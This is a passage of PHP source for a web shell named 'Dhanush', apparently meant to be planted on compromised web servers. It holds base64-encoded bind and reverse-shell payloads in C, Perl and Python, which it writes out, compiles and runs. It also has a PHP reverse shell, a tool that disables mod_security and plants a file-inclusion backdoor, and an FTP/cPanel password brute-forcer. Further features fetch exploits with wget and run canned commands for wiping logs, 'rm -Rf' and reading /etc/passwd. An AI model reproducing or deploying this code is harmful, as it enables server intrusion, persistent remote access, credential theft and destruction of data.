5516 if(ajaxRequest.readyState == 4)
5517 {
5518 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
5519 }
5520 }
5521
5522 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
5523 ajaxRequest.send(null);
5524}
5525function getexploit(wurl,path,functiontype)
5526{
5527 document.getElementById("showexp").innerHTML=waitstate;
5528 var ajaxRequest;
5529 ajaxRequest = new XMLHttpRequest();
5530
5531 ajaxRequest.onreadystatechange = function()
5532 {
5533 if(ajaxRequest.readyState == 4)
5534 {
5535 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
5536 }
5537 }
5538
5539 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
5540 ajaxRequest.send(null);
5541}
5542function showMsg(msg)
5543{
5544 if(msg == 'smf')
5545 {
5546 document.getElementById('tableprefix').value="smf_";
5547 document.getElementById('fid').style.display='block';
5548 document.getElementById('wpress').style.display='none';
5549 document.getElementById('joomla').style.display='none';
5550 }
5551 if(msg == 'mybb')
5552 {
5553 document.getElementById('tableprefix').value="mybb_";
5554 document.getElementById('wpress').style.display='none';
5555 document.getElementById('joomla').style.display='none';
5556 document.getElementById('fid').style.display='block';
5557 }
5558 if(msg == 'ipb' || msg == 'vb')
5559 {
5560 document.getElementById('tableprefix').value="";
5561 document.getElementById('wpress').style.display='none';
5562 document.getElementById('joomla').style.display='none';
5563 document.getElementById('fid').style.display='block';
5564 }
5565 if(msg == 'wp')
5566 {
5567 document.getElementById('tableprefix').value="wp_";
5568 document.getElementById('wpress').style.display='block';
5569 document.getElementById('fid').style.display='none';
5570 document.getElementById('joomla').style.display='none';
5571 }
5572 if(msg == 'joomla')
5573 {
5574 document.getElementById('joomla').style.display='block';
5575 document.getElementById('tableprefix').value="jos_";
5576 document.getElementById('wpress').style.display='none';
5577 document.getElementById('fid').style.display='none';
5578
5579
5580 }
5581}
5582function checkforum(msg)
5583{
5584 if(msg == 'smf')
5585 {
5586 document.getElementById('tableprefix').value="smf_";
5587 document.getElementById('smfipb').style.display='block';
5588 document.getElementById('myjoomla').style.display='none';
5589 document.getElementById('wordpres').style.display='none';
5590 }
5591 if(msg == 'phpbb')
5592 {
5593 document.getElementById('tableprefix').value="phpb_";
5594 document.getElementById('myjoomla').style.display='none';
5595 document.getElementById('smfipb').style.display='block';
5596 document.getElementById('wordpres').style.display='none';
5597 }
5598 if(msg == 'mybb')
5599 {
5600 document.getElementById('tableprefix').value="mybb_";
5601 document.getElementById('myjoomla').style.display='none';
5602 document.getElementById('smfipb').style.display='none';
5603 }
5604 if(msg == 'vb')
5605 {
5606 document.getElementById('tableprefix').value="";
5607 document.getElementById('myjoomla').style.display='none';
5608 document.getElementById('smfipb').style.display='none';
5609 }
5610 if(msg == 'ipb')
5611 {
5612 document.getElementById('myjoomla').style.display='none';
5613 document.getElementById('smfipb').style.display='block';
5614 document.getElementById('tableprefix').value="";
5615 document.getElementById('wordpres').style.display='none';
5616
5617 }
5618 if(msg == 'wp')
5619 {
5620 document.getElementById('tableprefix').value="wp_";
5621 document.getElementById('myjoomla').style.display='none';
5622 document.getElementById('smfipb').style.display='block';
5623 document.getElementById('wordpres').style.display='block';
5624 }
5625 if(msg == 'joomla')
5626 {
5627 document.getElementById('myjoomla').style.display='block';
5628 document.getElementById('tableprefix').value="jos_";
5629 document.getElementById('smfipb').style.display='none';
5630
5631 }
5632}
5633</script>
5634<body>
5635<?php
5636
5637$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
5638
5639$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
5640
5641$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
5642
5643$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
5644shellstyle();
5645?>
5646<div align="center">
5647<a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Arjun </font></a>
5648
5649</div>
5650<hr color="#1B1B1B">
5651
5652<table cellpadding="0" style="width:100%;">
5653 <tr>
5654 <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
5655 <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
5656 <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
5657 </tr>
5658 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
5659 <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
5660 <?php $d0mains = @file("/etc/named.conf");
5661 $users=@file('/etc/passwd');
5662 if($d0mains)
5663 {
5664 $count;
5665 foreach($d0mains as $d0main)
5666 {
5667 if(@ereg("zone",$d0main))
5668 {
5669 preg_match_all('#zone "(.*)"#', $d0main, $domains);
5670 flush();
5671 if(strlen(trim($domains[1][0])) > 2)
5672 {
5673 flush();
5674 $count++;
5675 }
5676 }
5677 }
5678 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
5679 }
5680 else if($users)
5681 {
5682 $file = fopen("/etc/passwd", "r");
5683 while(!feof($file))
5684 {
5685 $s = fgets($file);
5686 $matches = array();
5687 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5688 $matches = str_replace("home/","",$matches[1]);
5689 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5690 continue;
5691 $count++;
5692 }
5693 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
5694 </tr><?php } ?>
5695 <tr>
5696 <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
5697 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
5698
5699 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
5700 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
5701 </tr>
5702
5703 <tr>
5704 <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
5705 <td style="width:30%;">Current Directory : <span id="crdir"><font color="#009900">
5706 <?php
5707 $d = str_replace("\\",$directorysperator,$dir);
5708 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
5709 $d = str_replace("\\\\","\\",$d);
5710 $dispd = htmlspecialchars($d);
5711 $pd = $e = explode($directorysperator,substr($d,0,-1));
5712 $i = 0;
5713 foreach($pd as $b)
5714 {
5715 $t = '';
5716 $j = 0;
5717 foreach ($e as $r)
5718 {
5719 $t.= $r.$directorysperator;
5720 if ($j == $i) {break;}
5721 $j++;
5722 }
5723$href=addslashes($t);
5724
5725 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
5726 $i++;
5727 }
5728
5729 ?>
5730 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
5731 <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
5732 <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
5733 <?php if($os == "Linux") { ?><td><a href="<?php echo $self.'?downloadit'?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
5734 </tr>
5735 </table>
5736
5737<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
5738 $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
5739 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
5740 <tr>";
5741 $menu = '';
5742
5743 foreach($m1 as $k => $v)
5744 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5745 echo $menu;
5746 echo "</tr>
5747</table>
5748<div style=\"float:left;\">
5749 <a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </font></a>
5750 <a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] </font></a>
5751 <a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
5752<table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; cellpadding=2>
5753 <tr align=center>";
5754 foreach($m2 as $k => $v)
5755 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5756 echo $menu1;
5757 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
5758 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
5759 </tr>
5760</table>";?>
5761
5762<div id="showmaindata"></div>
5763<?php
5764
5765if(isset($_GET["downloadit"]))
5766{
5767 $FolderToCompress = getcwd();
5768 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
5769
5770 $prd=explode("/","backup.tar");
5771 for($i=0;$i<sizeof($prd);$i++)
5772 {
5773 $nfd=$prd[$i];
5774 }
5775 @ob_clean();
5776 header("Content-type: application/octet-stream");
5777 header("Content-length: ".filesize($nfd));
5778 header("Content-disposition: attachment; filename=\"".$nfd."\";");
5779 readfile($nfd);
5780 exit;
5781}
5782//Turn Safe Mode Off
5783
5784 if(getDisabledFunctions() != "None" || safe() != "OFF")
5785 {
5786 $file_pointer = fopen(".htaccess", "w+");
5787 fwrite($file_pointer, "<IfModule mod_security.c>
5788 SecFilterEngine Off
5789 SecFilterScanPOST Off
5790 </IfModule> \n\r");
5791
5792 $file_pointer = fopen("ini.php", "w+");
5793 fwrite($file_pointer, "<?
5794echo ini_get(\"safe_mode\");
5795echo ini_get(\"open_basedir\");
5796include(\$_GET[\"file\"]);
5797ini_restore(\"safe_mode\");
5798ini_restore(\"open_basedir\");
5799echo ini_get(\"safe_mode\");
5800echo ini_get(\"open_basedir\");
5801include(\$_GET[\"ss\"]);
5802?>");
5803
5804 $file_pointer = fopen("php.ini", "w+");
5805 fwrite($file_pointer, "safe_mode = Off");
5806
5807 fclose($file_pointer);
5808
5809 }
5810
5811 else if(isset($_POST['cpanelattack']))
5812 {
5813 if(!empty($_POST['username']) && !empty($_POST['password']))
5814 {
5815 $userlist=explode("\n",$_POST['username']);
5816 $passlist=explode("\n",$_POST['password']);
5817
5818 if($_POST['cracktype'] == "ftp")
5819 {
5820 foreach ($userlist as $user)
5821 {
5822 $pureuser = trim($user);
5823 foreach ($passlist as $password )
5824 {
5825 $purepass = trim($password);
5826 ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5827 }
5828 }
5829 }
5830 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
5831 {
5832 if($cracktype == "telnet")
5833 $cpanel_port="23";
5834 else
5835 $cpanel_port="2082";
5836 foreach ($userlist as $user)
5837 {
5838 $pureuser = trim($user);
5839
5840 echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
5841 Processing user $pureuser ...</font></b><br><br>";
5842
5843 foreach ($passlist as $password )
5844 {
5845 $purepass = trim($password);
5846 cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5847
5848 }
5849 }
5850 }
5851 }
5852 else
5853 $bdmessage = "<center>Enter Username & Password List<center>";
5854 }
5855
5856else if(isset($_GET['info']))
5857{
5858 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
5859}
5860else if(isset($_POST['u']))
5861{
5862 $path = $_REQUEST['path'];
5863 if(is_dir($path))
5864 {
5865 $setuploadvalue = 0;
5866 $uploadedFilePath = $_FILES['uploadfile']['name'];
5867 $tempName = $_FILES['uploadfile']['tmp_name'];
5868 if($os == "Windows")
5869 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5870 else if($os == "Linux")
5871 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5872 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
5873 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
5874 else
5875 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
5876 }
5877 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
5878}
5879else if(isset($_POST['backdoor']))
5880{
5881 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
5882 { ?><script type="text/javascript">gethome('connect');</script><?php
5883 $passwd = $_POST['passwd'];
5884
5885 if($_POST['lang'] == 'c')
5886 {
5887 if(is_writable("."))
5888 {
5889 @$fh=fopen(getcwd()."/backp.c",'w');
5890 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5891 @fclose($fh);
5892 execmd("chmod 0755 ".getcwd()."/backp.c");
5893 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
5894 execmd("chmod 0755 ".getcwd()."/backp");
5895 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
5896 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5897 if(eregi("backp".$_POST['port'],$scan))
5898 $bdmessage = "Process found running, backdoor setup successfully.";
5899 else
5900 $bdmessage = "Process not found running, backdoor not setup successfully.";
5901 }
5902 else
5903 {
5904 @$fh=fopen("/tmp/backp.c","w");
5905 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5906 @fclose($fh);
5907 execmd("chmod 0755 /tmp/backp.c");
5908 execmd("gcc -o /tmp/backp /tmp/backp.c");
5909 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
5910 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5911 if(eregi("backp".$_POST['port'],$scan))
5912 $bdmessage = "Process found running, backdoor setup successfully.";
5913 else
5914 $bdmessage = "Process not found running, backdoor not setup successfully.";
5915 }
5916 }
5917 if($_POST['lang'] == 'perl')
5918 {
5919 if(is_writable("."))
5920 {
5921 @$fh=fopen(getcwd()."/bp.pl",'w');
5922 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5923 @fclose($fh);
5924 execmd("chmod 0755 ".getcwd()."/bp.pl");
5925 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5926
5927 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5928 }
5929 else
5930 {
5931 @$fh=fopen("/tmp/bp.pl","w");
5932 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5933 @fclose($fh);
5934 execmd("chmod 0755 ".getcwd()."/bp.pl");
5935 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5936 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5937 }
5938 }
5939 }
5940}
5941else if(isset($_POST['backconnect']))
5942{
5943 if($_POST['ip'] != "" && $_POST['port'] != "")
5944 { ?><script type="text/javascript">gethome('connect');</script><?php
5945 $host = $_POST['ip'];
5946 $port = $_POST['port'];
5947 if($_POST["lang"] == "perl")
5948 {
5949 if(is_writable("."))
5950 {
5951 @$fh=fopen(getcwd()."/bc.pl",'w');
5952 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5953 @fclose($fh);
5954 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5955 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
5956 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
5957 }
5958 else
5959 {
5960 @$fh=fopen("/tmp/bc.pl","w");
5961 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5962 @fclose($fh);
5963 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5964 execmd("perl /tmp/bc.pl $host $port &",$disable);
5965 if(!@unlink("/tmp/bc.pl"))
5966 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5967 }
5968 }
5969 else if($_POST["lang"] == "python")
5970 {
5971 if(is_writable("."))
5972 {
5973 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
5974 if($w_file)
5975 {
5976 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5977 @fclose($w_file);
5978 chmod(getcwd().'/bc.py', 0777);
5979 }
5980 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
5981 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5982
5983 if(!@unlink(getcwd()."/bc.py"))
5984 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5985 }
5986 else
5987 {
5988 $w_file=@fopen("/tmp/bc.py","w");
5989 if($w_file)
5990 {
5991 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5992 @fclose($w_file);
5993 chmod('/tmp/bc.py', 0777);
5994 }
5995 execmd("python /tmp/bc.py $host $port &",$disable);
5996 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5997 if(!@unlink("/tmp/bc.py"))
5998 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
5999 }
6000 }
6001 else if($_POST["lang"] == "php")
6002 {
6003 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6004 $ip = $_POST['ip'];
6005 $port=$_POST['port'];
6006 $sockfd=fsockopen($ip , $port , $errno, $errstr );
6007 if($errno != 0)
6008 {
6009 $bdmessage = "<font color='red'><b>$errno</b> : $errstr</font>";
6010 }
6011 else if (!$sockfd)
6012 {
6013 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
6014 }
6015 else
6016 {
6017 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
6018 $pwd = exec_all("pwd");
6019 $sysinfo = exec_all("uname -a");
6020 $id = exec_all("id");
6021 $len = 1337;
6022 fputs($sockfd ,$sysinfo . "\n" );
6023 fputs($sockfd ,$pwd . "\n" );
6024 fputs($sockfd ,$id ."\n\n" );
6025 fputs($sockfd ,$dateAndTime."\n\n" );
6026 while(!feof($sockfd))
6027 {
6028 $cmdPrompt ="(dhanush)[$]> ";
6029 fputs ($sockfd , $cmdPrompt );
6030 $command= fgets($sockfd, $len);
6031 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
6032 }
6033 fclose($sockfd);
6034 }
6035 }
6036 }
6037}
6038else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
6039{
6040 $temp = "";
6041 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
6042 {
6043 $uid = @posix_getpwuid($_GET['val1']);
6044 if ($uid)
6045 $temp .= join(':',$uid)."\n";
6046 }
6047 echo '<br/>';
6048 paramexe('Users', $temp);
6049}
6050else if(isset($_GET['download']))
6051{
6052 download();
6053}
6054else
6055{
6056 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
6057}
6058$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
6059?>
6060</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
6061<table style="width:100%;border-color:#333333;" border="1">
6062<tr>
6063<td align="center">
6064<form method="post" enctype="multipart/form-data">
6065Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
6066<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
6067<input type=submit value="Upload" name="u" value="u" class="but" ></form>
6068<span name="wrtble"><?php
6069echo $is_writable; ?></span>
6070 <br>
6071</td>
6072<td align="center" style="height:105px;">Create File :
6073<form onSubmit="createdir('Create',createfile.value);return false;">
6074<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
6075<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
6076</form><span name="wrtble">
6077<?php echo $is_writable; ?></span>
6078</td>
6079</tr>
6080<tr>
6081<td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
6082<input type="text" class="box" name="execute">
6083<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
6084 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
6085
6086<td align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
6087<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
6088<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
6089</form><span name="wrtble"><?php
6090echo $is_writable;
6091?></span></td></tr>
6092<tr><td style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
6093<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
6094<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
6095<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
6096<select name="functiontype" class="sbox">
6097<option value="wwget">wget</option>
6098<option value="wlynx">lynx</option>
6099<option value="wfread">fread</option>
6100<option value="wfetch">fetch</option>
6101<option value="wlinks">links</option>
6102<option value="wget">GET</option>
6103<option value="wcurl">curl</option>
6104</select>
6105</form><div id="showexp"></div>
6106</td>
6107<td align="center">
6108<form>
6109Some Commands<br>
6110<?php if($os != "Windows")
6111{ ?>
6112<SELECT NAME="mycmd" class="box">
6113 <OPTION VALUE="uname -a">Kernel version
6114 <OPTION VALUE="w">Logged in users
6115 <OPTION VALUE="lastlog">Last to connect
6116 <option value='cat /etc/hosts'>IP Addresses
6117 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
6118 <OPTION VALUE="logeraser">Log Eraser
6119 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
6120 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
6121 <OPTION VALUE="find / -type f -name \"config*\"">find config* files
6122 <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
6123 <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
6124 <OPTION VALUE="find / -type f -perm -04000 -ls">find all suid files
6125 <OPTION VALUE="find / -user root -perm -022">find all sgid files
6126 <OPTION VALUE="find . -type f -perm -02000 -ls">find suid files in current dir
6127 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
6128 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
6129 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
6130 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
6131 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
6132 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
6133 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
6134 <OPTION VALUE="ps aux">Show running proccess
6135 <OPTION VALUE="uptime">Uptime check
6136 <OPTION VALUE="cat /proc/meminfo">Memory check
6137 <OPTION VALUE="netstat -an | grep -i listen">Open ports
6138 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
6139 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
6140 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
6141 <OPTION VALUE="./zap2">WIPELOGS PT3
6142 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
6143 </SELECT>
6144 <?php } else {?>
6145 <SELECT NAME="mycmd" class="box">
6146 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
6147 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
6148 <OPTION VALUE="systeminfo">System Informations
6149 <OPTION VALUE="net user">User accounts
6150 <OPTION VALUE="netstat -an">Open ports
6151 <OPTION VALUE="getmac">Get Mac Address
6152 <OPTION VALUE="net start">Show running services
6153 <OPTION VALUE="net view">Show computers
6154 <OPTION VALUE="arp -a">ARP Table
6155 <OPTION VALUE="tasklist">Show Process
6156 <OPTION VALUE="ipconfig/all">IP Configuration
6157
6158 </SELECT>
6159 <?php } ?>
6160 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
6161<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
6162</form>
6163</td>
6164</tr></table><br>
6165
6166</td>
6167</tr>
6168</table>
6169
6170<?php
6171
6172
6173//logout
6174
6175if(isset($_GET['logout']))
6176{
6177 setcookie("hacked",time() - 60*60);
6178 header("Location:$self");
6179 ob_end_flush();
6180}
6181?>
6182
6183
